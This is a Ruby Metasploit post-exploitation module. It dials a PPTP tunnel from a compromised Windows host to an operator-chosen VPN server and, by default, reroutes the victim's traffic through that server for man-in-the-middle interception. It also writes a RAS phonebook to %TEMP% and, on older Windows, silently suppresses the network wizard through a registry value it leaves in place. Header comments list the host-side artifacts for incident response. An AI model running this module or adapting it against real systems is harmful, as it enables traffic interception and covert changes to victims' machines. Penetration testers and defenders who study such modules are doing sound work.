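##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post module that dials a PPTP connection from the compromised Windows host to an
# operator-supplied VPN server via the built-in `rasdial` client, using a temporary
# RAS phonebook (.pbk) written to %TEMP%.
#
# Host-side footprint (useful for detection/incident response):
#   * a .pbk file with a random name is written to %TEMP% and removed at the end of #run
#   * `rasdial` is launched three times (disconnect, connect, status) by cmd_exec
#   * on Vista..Win7 SP1 the registry value
#     HKLM\System\CurrentControlSet\Control\Network\NewNetworkWindowOff is created
#     and is NOT reverted by this module
class MetasploitModule < Msf::Post
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Registry

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Manage Remote Point-to-Point Tunneling Protocol',
        'Description' => %q{
          This module initiates a PPTP connection to a remote machine (VPN server). Once
          the tunnel is created we can use it to force the victim traffic to go through the
          server getting a man in the middle attack. Be sure to allow forwarding and
          masquerading on the VPN server (mitm).
        },
        'License' => MSF_LICENSE,
        'Author' => 'Borja Merino <bmerinofe[at]gmail.com>',
        'References' => [
          [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ],
          [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
        ],
        'Platform' => 'win',
        'SessionTypes' => [ 'meterpreter' ],
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [CONFIG_CHANGES],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        OptString.new('USERNAME', [true, 'VPN Username.' ]),
        OptString.new('PASSWORD', [true, 'VPN Password.' ]),
        OptBool.new('MITM', [true, 'Man in the middle.', true]),
        OptInt.new('TIMEOUT', [true, 'Timeout for the tunnel creation.', 60]),
        OptString.new('PBK_NAME', [true, 'PhoneBook entry name.', 'MSF']),
        OptAddress.new('VPNHOST', [true, 'VPN server.'])
      ]
    )
  end

  # Module entry point: optionally suppress the "new network" wizard, write the
  # phonebook, dial the tunnel under a timeout, then remove the phonebook.
  #
  # Aborts early (with print_error) when the phonebook cannot be written, so that
  # rasdial is never invoked with an empty /PHONEBOOK: and file_rm is never called
  # with nil.
  #
  # @return [void]
  def run
    version = get_version_info
    # The network-location wizard only exists on Vista..Win7; it would pop up on
    # the victim's desktop when the new RAS interface comes up.
    disable_network_wizard if version.build_number.between?(Msf::WindowsVersion::Vista_SP0, Msf::WindowsVersion::Win7_SP1)

    pbk = create_pbk(datastore['MITM'], datastore['PBK_NAME'])
    unless pbk
      print_error('PhoneBook configuration could not be written, aborting')
      return
    end

    # A non-positive TIMEOUT falls back to the option's documented default.
    to = datastore['TIMEOUT'] <= 0 ? 60 : datastore['TIMEOUT']
    begin
      ::Timeout.timeout(to) do
        run_rasdial(pbk, datastore['USERNAME'], datastore['PASSWORD'], datastore['VPNHOST'], datastore['PBK_NAME'])
      end
    rescue ::Timeout::Error
      print_error("Timeout after #{to} seconds")
    ensure
      # Remove the phonebook whether dialing succeeded, failed or timed out.
      file_rm(pbk)
      print_status('Phonebook deleted')
    end
  end

  # Creates HKLM\System\CurrentControlSet\Control\Network\NewNetworkWindowOff
  # (REG_BINARY, value 3) when it does not already exist. Requires admin; the
  # value is left in place afterwards (no revert is performed by this module).
  #
  # @return [void]
  def disable_network_wizard
    unless is_admin?
      print_error("You don't have enough privileges to change the registry. Network Wizard will not be disabled")
      return
    end

    key = 'HKLM\\System\\CurrentControlSet\\Control\\Network'
    value = 'NewNetworkWindowOff'
    begin
      # Only create the value when it is absent, so an existing setting is not clobbered.
      unless registry_getvaldata(key, value)
        registry_setvaldata(key, value, 3, 'REG_BINARY')
        print_good('Network Wizard disabled')
      end
    rescue StandardError => e
      print_status("The following error was encountered: #{e.class} #{e}")
    end
  end

  # Writes a minimal RAS phonebook entry named +pbk_name+ into a randomly named
  # .pbk file under %TEMP% on the target.
  #
  # @param mim [Boolean] when false, IpPrioritizeRemote=0 keeps the local default
  #   route; when true the entry is left at the RAS default so traffic is routed
  #   through the tunnel
  # @param pbk_name [String] phonebook entry name (also used by rasdial)
  # @return [String, nil] remote path of the written file, or nil when write_file failed
  def create_pbk(mim, pbk_name)
    pbk_dir = expand_path('%TEMP%')
    # Build a fresh string instead of appending to the value returned by expand_path.
    pbk_file = "#{pbk_dir}\\#{Rex::Text.rand_text_alpha(6..13)}.pbk"

    conf_conn = "[#{pbk_name}]\r\n\r\n"
    conf_conn += "MEDIA=rastapi\r\n"
    conf_conn += "Port=VPN4-0\r\n"
    conf_conn += "DEVICE=vpn\r\n"
    conf_conn += "IpPrioritizeRemote=0\r\n" unless mim

    unless write_file(pbk_file, conf_conn)
      print_error("Unable to write PhoneBook configuration to #{pbk_file}")
      return nil
    end

    print_good("PhoneBook configuration written to #{pbk_file}")
    pbk_file
  end

  # Dials the phonebook entry with rasdial and reports whether the entry shows up
  # in the subsequent `rasdial` status output.
  #
  # NOTE: the VPN username and password are passed as rasdial command-line
  # arguments, so they are exposed to process listings and to any process-creation
  # auditing (command-line logging) active on the host.
  #
  # @param pbk [String] remote path of the phonebook file
  # @param user [String] VPN username
  # @param pass [String] VPN password
  # @param vpn_host [String] VPN server address
  # @param pbk_name [String] phonebook entry name
  # @return [void]
  def run_rasdial(pbk, user, pass, vpn_host, pbk_name)
    print_status('Establishing connection ...')
    cmd_exec('rasdial', '/disconnect')
    output_run = cmd_exec('rasdial', "#{pbk_name} #{user} #{pass} /PHONE:#{vpn_host} /PHONEBOOK:#{pbk}")
    output_view = cmd_exec('rasdial', nil)

    # Escape the entry name: PBK_NAME is operator input and may contain regex metacharacters.
    if output_view =~ /#{Regexp.escape(pbk_name)}/i
      print_good('Connection Successful')
    else
      print_error("Connection failure: #{output_run}")
    end
  end
end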